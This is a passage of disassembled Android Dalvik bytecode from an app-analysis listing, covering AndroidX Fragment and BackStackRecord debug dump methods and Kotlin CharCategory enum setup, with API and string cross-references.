                        158if-eqz v0, :cond_ea
                        160invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        162const-string v0, "mParentFragment="
                        164invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        166iget-object v0, p0, Landroidx/fragment/app/Fragment;->mParentFragment:Landroidx/fragment/app/Fragment;
                        168invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        169cond_ea:
                        170iget-object v0, p0, Landroidx/fragment/app/Fragment;->mArguments:Landroid/os/Bundle;
                        171if-eqz v0, :cond_fb
                        173invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        175const-string v0, "mArguments="
                        177invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        179iget-object v0, p0, Landroidx/fragment/app/Fragment;->mArguments:Landroid/os/Bundle;
                        181invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        182cond_fb:
                        183iget-object v0, p0, Landroidx/fragment/app/Fragment;->mSavedFragmentState:Landroid/os/Bundle;
                        184if-eqz v0, :cond_10c
                        186invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        188const-string v0, "mSavedFragmentState="
                        190invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        192iget-object v0, p0, Landroidx/fragment/app/Fragment;->mSavedFragmentState:Landroid/os/Bundle;
                        194invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        195cond_10c:
                        196iget-object v0, p0, Landroidx/fragment/app/Fragment;->mSavedViewState:Landroid/util/SparseArray;
                        197if-eqz v0, :cond_11d
                        199invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        201const-string v0, "mSavedViewState="
                        203invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        205iget-object v0, p0, Landroidx/fragment/app/Fragment;->mSavedViewState:Landroid/util/SparseArray;
                        207invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        208cond_11d:
                        209invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getTargetFragment()Landroidx/fragment/app/Fragment;
                        210move-result-object v0
                        211if-eqz v0, :cond_138
                        213invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        215const-string v1, "mTarget="
                        217invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        219invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/Object;)V
                        221const-string v0, " mTargetRequestCode="
                        223invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        224iget v0, p0, Landroidx/fragment/app/Fragment;->mTargetRequestCode:I
                        226invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(I)V
                        227cond_138:
                        228invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getNextAnim()I
                        229move-result v0
                        230if-eqz v0, :cond_14d
                        232invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        234const-string v0, "mNextAnim="
                        236invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        238invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getNextAnim()I
                        239move-result v0
                        241invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(I)V
                        242cond_14d:
                        243iget-object v0, p0, Landroidx/fragment/app/Fragment;->mContainer:Landroid/view/ViewGroup;
                        244if-eqz v0, :cond_15e
                        246invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        248const-string v0, "mContainer="
                        250invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        252iget-object v0, p0, Landroidx/fragment/app/Fragment;->mContainer:Landroid/view/ViewGroup;
                        254invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        255cond_15e:
                        256iget-object v0, p0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        257if-eqz v0, :cond_16f
                        259invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        261const-string v0, "mView="
                        263invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        265iget-object v0, p0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        267invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        268cond_16f:
                        269invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getAnimatingAway()Landroid/view/View;
                        270move-result-object v0
                        271if-eqz v0, :cond_193
                        273invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        275const-string v0, "mAnimatingAway="
                        277invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        279invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getAnimatingAway()Landroid/view/View;
                        280move-result-object v0
                        282invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        284invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        286const-string v0, "mStateAfterAnimating="
                        288invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        290invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getStateAfterAnimating()I
                        291move-result v0
                        293invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(I)V
                        294cond_193:
                        295invoke-virtual {p0}, Landroidx/fragment/app/Fragment;->getContext()Landroid/content/Context;
                        296move-result-object v0
                        297if-eqz v0, :cond_1a0
                        299invoke-static {p0}, Landroidx/loader/app/LoaderManager;->getInstance(Landroidx/lifecycle/LifecycleOwner;)Landroidx/loader/app/LoaderManager;
                        300move-result-object v0
                        302invoke-virtual {v0, p1, p2, p3, p4}, Landroidx/loader/app/LoaderManager;->dump(Ljava/lang/String;Ljava/io/FileDescriptor;Ljava/io/PrintWriter;[Ljava/lang/String;)V
                        303cond_1a0:
                        304invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        305new-instance v0, Ljava/lang/StringBuilder;
                        307invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        309const-string v1, "Child "
                        311invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        313iget-object v1, p0, Landroidx/fragment/app/Fragment;->mChildFragmentManager:Landroidx/fragment/app/FragmentManager;
                        315invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        317const-string v1, ":"
                        319invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        321invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        322move-result-object v0
                        324invoke-virtual {p3, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        326iget-object v0, p0, Landroidx/fragment/app/Fragment;->mChildFragmentManager:Landroidx/fragment/app/FragmentManager;
                        327new-instance v1, Ljava/lang/StringBuilder;
                        329invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        331invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        333const-string p1, " "
                        335invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        337invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        338move-result-object p1
                        340invoke-virtual {v0, p1, p2, p3, p4}, Landroidx/fragment/app/FragmentManager;->dump(Ljava/lang/String;Ljava/io/FileDescriptor;Ljava/io/PrintWriter;[Ljava/lang/String;)V
                        341return-void
                        Cross References
                        APIs
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.isEmpty
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.size
                        • java.util.ArrayList.get
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.lang.Integer.toHexString
                        • java.io.PrintWriter.println
                        Strings
                        • mName=
                        • mIndex=
                        • mCommitted=
                        • mTransition=#
                        • mEnterAnim=#
                        • mExitAnim=#
                        • mPopEnterAnim=#
                        • mPopExitAnim=#
                        • mBreadCrumbTitleRes=#
                        • mBreadCrumbTitleText=
                        • mBreadCrumbShortTitleRes=#
                        • mBreadCrumbShortTitleText=
                        • Operations:
                        • cmd=
                        • OP_SET_MAX_LIFECYCLE
                        • UNSET_PRIMARY_NAV
                        • SET_PRIMARY_NAV
                        • ATTACH
                        • DETACH
                        • SHOW
                        • HIDE
                        • REMOVE
                        • REPLACE
                        • ADD
                        • NULL
                        • Op #
                        • :
                        • enterAnim=#
                        • exitAnim=#
                        • popEnterAnim=#
                        • popExitAnim=#
                        Position Instruction Meta Information
                        0if-eqz p3, :cond_cc
                        2invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        4const-string v0, "mName="
                        6invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        8iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mName:Ljava/lang/String;
                        10invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        12const-string v0, " mIndex="
                        14invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        15iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mIndex:I
                        17invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(I)V
                        19const-string v0, " mCommitted="
                        21invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        22iget-boolean v0, p0, Landroidx/fragment/app/BackStackRecord;->mCommitted:Z
                        24invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->println(Z)V
                        25iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mTransition:I
                        26if-eqz v0, :cond_38
                        28invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        30const-string v0, "mTransition=#"
                        32invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        33iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mTransition:I
                        35invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        36move-result-object v0
                        38invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        39cond_38: iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mEnterAnim:I
                        40if-nez v0, :cond_40
                        41iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mExitAnim:I
                        42if-eqz v0, :cond_5f
                        43cond_40:
                        44invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        46const-string v0, "mEnterAnim=#"
                        48invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        49iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mEnterAnim:I
                        51invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        52move-result-object v0
                        54invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        56const-string v0, " mExitAnim=#"
                        58invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        59iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mExitAnim:I
                        61invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        62move-result-object v0
                        64invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        65cond_5f: iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mPopEnterAnim:I
                        66if-nez v0, :cond_67
                        67iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mPopExitAnim:I
                        68if-eqz v0, :cond_86
                        69cond_67:
                        70invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        72const-string v0, "mPopEnterAnim=#"
                        74invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        75iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mPopEnterAnim:I
                        77invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        78move-result-object v0
                        80invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        82const-string v0, " mPopExitAnim=#"
                        84invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        85iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mPopExitAnim:I
                        87invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        88move-result-object v0
                        90invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        91cond_86: iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbTitleRes:I
                        92if-nez v0, :cond_8e
                        94iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbTitleText:Ljava/lang/CharSequence;
                        95if-eqz v0, :cond_a9
                        96cond_8e:
                        97invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        99const-string v0, "mBreadCrumbTitleRes=#"
                        101invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        102iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbTitleRes:I
                        104invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        105move-result-object v0
                        107invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        109const-string v0, " mBreadCrumbTitleText="
                        111invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        113iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbTitleText:Ljava/lang/CharSequence;
                        115invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        116cond_a9: iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbShortTitleRes:I
                        117if-nez v0, :cond_b1
                        119iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbShortTitleText:Ljava/lang/CharSequence;
                        120if-eqz v0, :cond_cc
                        121cond_b1:
                        122invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        124const-string v0, "mBreadCrumbShortTitleRes=#"
                        126invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        127iget v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbShortTitleRes:I
                        129invoke-static {v0}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        130move-result-object v0
                        132invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        134const-string v0, " mBreadCrumbShortTitleText="
                        136invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        138iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mBreadCrumbShortTitleText:Ljava/lang/CharSequence;
                        140invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        141cond_cc:
                        142iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mOps:Ljava/util/ArrayList;
                        144invoke-virtual {v0}, Ljava/util/ArrayList;->isEmpty()Z
                        145move-result v0
                        146if-nez v0, :cond_197
                        148invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        150const-string v0, "Operations:"
                        152invoke-virtual {p2, v0}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        154iget-object v0, p0, Landroidx/fragment/app/BackStackRecord;->mOps:Ljava/util/ArrayList;
                        156invoke-virtual {v0}, Ljava/util/ArrayList;->size()I
                        157move-result v0
                        158const/4 v1, 0x0
                        159goto_e3: if-ge v1, v0, :cond_197
                        161iget-object v2, p0, Landroidx/fragment/app/BackStackRecord;->mOps:Ljava/util/ArrayList;
                        163invoke-virtual {v2, v1}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        164move-result-object v2
                        165check-cast v2, Landroidx/fragment/app/FragmentTransaction$Op;
                        166iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mCmd:I
                        167packed-switch v3, :pswitch_data_198
                        168new-instance v3, Ljava/lang/StringBuilder;
                        170invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        172const-string v4, "cmd="
                        174invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        175iget v4, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mCmd:I
                        177invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        179invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        180move-result-object v3
                        181goto/16 :goto_126
                        182pswitch_106:
                        183const-string v3, "OP_SET_MAX_LIFECYCLE"
                        184goto/16 :goto_126
                        185pswitch_109:
                        186const-string v3, "UNSET_PRIMARY_NAV"
                        187goto/16 :goto_126
                        188pswitch_10c:
                        189const-string v3, "SET_PRIMARY_NAV"
                        190goto/16 :goto_126
                        191pswitch_10f:
                        192const-string v3, "ATTACH"
                        193goto/16 :goto_126
                        194pswitch_112:
                        195const-string v3, "DETACH"
                        196goto/16 :goto_126
                        197pswitch_115:
                        198const-string v3, "SHOW"
                        199goto/16 :goto_126
                        200pswitch_118:
                        201const-string v3, "HIDE"
                        202goto/16 :goto_126
                        203pswitch_11b:
                        204const-string v3, "REMOVE"
                        205goto/16 :goto_126
                        206pswitch_11e:
                        207const-string v3, "REPLACE"
                        208goto/16 :goto_126
                        209pswitch_121:
                        210const-string v3, "ADD"
                        211goto/16 :goto_126
                        212pswitch_124:
                        213const-string v3, "NULL"
                        214goto_126:
                        215invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        217const-string v4, " Op #"
                        219invoke-virtual {p2, v4}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        221invoke-virtual {p2, v1}, Ljava/io/PrintWriter;->print(I)V
                        223const-string v4, ": "
                        225invoke-virtual {p2, v4}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        227invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        229const-string v3, " "
                        231invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        233iget-object v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mFragment:Landroidx/fragment/app/Fragment;
                        235invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        236if-eqz p3, :cond_193
                        237iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mEnterAnim:I
                        238if-nez v3, :cond_14d
                        239iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mExitAnim:I
                        240if-eqz v3, :cond_16c
                        241cond_14d:
                        242invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        244const-string v3, "enterAnim=#"
                        246invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        247iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mEnterAnim:I
                        249invoke-static {v3}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        250move-result-object v3
                        252invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        254const-string v3, " exitAnim=#"
                        256invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        257iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mExitAnim:I
                        259invoke-static {v3}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        260move-result-object v3
                        262invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        263cond_16c: iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mPopEnterAnim:I
                        264if-nez v3, :cond_174
                        265iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mPopExitAnim:I
                        266if-eqz v3, :cond_193
                        267cond_174:
                        268invoke-virtual {p2, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        270const-string v3, "popEnterAnim=#"
                        272invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        273iget v3, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mPopEnterAnim:I
                        275invoke-static {v3}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        276move-result-object v3
                        278invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        280const-string v3, " popExitAnim=#"
                        282invoke-virtual {p2, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        283iget v2, v2, Landroidx/fragment/app/FragmentTransaction$Op;->mPopExitAnim:I
                        285invoke-static {v2}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        286move-result-object v2
                        288invoke-virtual {p2, v2}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        289cond_193: add-int/lit8 v1, v1, 0x1
                        290goto/16 :goto_e3
                        291cond_197: return-void
                        APIs
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.<init>
                        • kotlin.text.CharCategory.$values
                        Strings
                        • UNASSIGNED
                        • Cn
                        • UPPERCASE_LETTER
                        • Lu
                        • LOWERCASE_LETTER
                        • Ll
                        • TITLECASE_LETTER
                        • Lt
                        • MODIFIER_LETTER
                        • Lm
                        • OTHER_LETTER
                        • Lo
                        • NON_SPACING_MARK
                        • Mn
                        • ENCLOSING_MARK
                        • Me
                        • COMBINING_SPACING_MARK
                        • Mc
                        • DECIMAL_DIGIT_NUMBER
                        • Nd
                        • LETTER_NUMBER
                        • Nl
                        • OTHER_NUMBER
                        • No
                        • SPACE_SEPARATOR
                        • Zs
                        • LINE_SEPARATOR
                        • Zl
                        • PARAGRAPH_SEPARATOR
                        • Zp
                        • CONTROL
                        • Cc
                        • FORMAT
                        • Cf
                        • PRIVATE_USE
                        • Co
                        • SURROGATE
                        • Cs
                        • DASH_PUNCTUATION
                        • Pd
                        • START_PUNCTUATION
                        • Ps
                        • END_PUNCTUATION
                        • Pe
                        • CONNECTOR_PUNCTUATION
                        • Pc
                        • OTHER_PUNCTUATION
                        • Po
                        • MATH_SYMBOL
                        • Sm
                        • CURRENCY_SYMBOL
                        • Sc
                        • MODIFIER_SYMBOL
                        • Sk
                        • OTHER_SYMBOL
                        • So
                        • INITIAL_QUOTE_PUNCTUATION
                        • Pi
                        • FINAL_QUOTE_PUNCTUATION
                        • Pf
                        Position Instruction Meta Information
                        0new-instance v0, Lkotlin/text/CharCategory;
                        2const-string v1, "UNASSIGNED"
                        3const/4 v2, 0x0
                        5const-string v3, "Cn"
                        7invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        8sput-object v0, Lkotlin/text/CharCategory;->UNASSIGNED:Lkotlin/text/CharCategory;
                        9new-instance v0, Lkotlin/text/CharCategory;
                        11const-string v1, "UPPERCASE_LETTER"
                        12const/4 v2, 0x1
                        14const-string v3, "Lu"
                        16invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        17sput-object v0, Lkotlin/text/CharCategory;->UPPERCASE_LETTER:Lkotlin/text/CharCategory;
                        18new-instance v0, Lkotlin/text/CharCategory;
                        20const-string v1, "LOWERCASE_LETTER"
                        21const/4 v2, 0x2
                        23const-string v3, "Ll"
                        25invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        26sput-object v0, Lkotlin/text/CharCategory;->LOWERCASE_LETTER:Lkotlin/text/CharCategory;
                        27new-instance v0, Lkotlin/text/CharCategory;
                        29const-string v1, "TITLECASE_LETTER"
                        30const/4 v2, 0x3
                        32const-string v3, "Lt"
                        34invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        35sput-object v0, Lkotlin/text/CharCategory;->TITLECASE_LETTER:Lkotlin/text/CharCategory;
                        36new-instance v0, Lkotlin/text/CharCategory;
                        38const-string v1, "MODIFIER_LETTER"
                        39const/4 v2, 0x4
                        41const-string v3, "Lm"
                        43invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        44sput-object v0, Lkotlin/text/CharCategory;->MODIFIER_LETTER:Lkotlin/text/CharCategory;
                        45new-instance v0, Lkotlin/text/CharCategory;
                        47const-string v1, "OTHER_LETTER"
                        48const/4 v2, 0x5
                        50const-string v3, "Lo"
                        52invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        53sput-object v0, Lkotlin/text/CharCategory;->OTHER_LETTER:Lkotlin/text/CharCategory;
                        54new-instance v0, Lkotlin/text/CharCategory;
                        56const-string v1, "NON_SPACING_MARK"
                        57const/4 v2, 0x6
                        59const-string v3, "Mn"
                        61invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        62sput-object v0, Lkotlin/text/CharCategory;->NON_SPACING_MARK:Lkotlin/text/CharCategory;
                        63new-instance v0, Lkotlin/text/CharCategory;
                        65const-string v1, "ENCLOSING_MARK"
                        66const/4 v2, 0x7
                        68const-string v3, "Me"
                        70invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        71sput-object v0, Lkotlin/text/CharCategory;->ENCLOSING_MARK:Lkotlin/text/CharCategory;
                        72new-instance v0, Lkotlin/text/CharCategory;
                        74const-string v1, "COMBINING_SPACING_MARK"
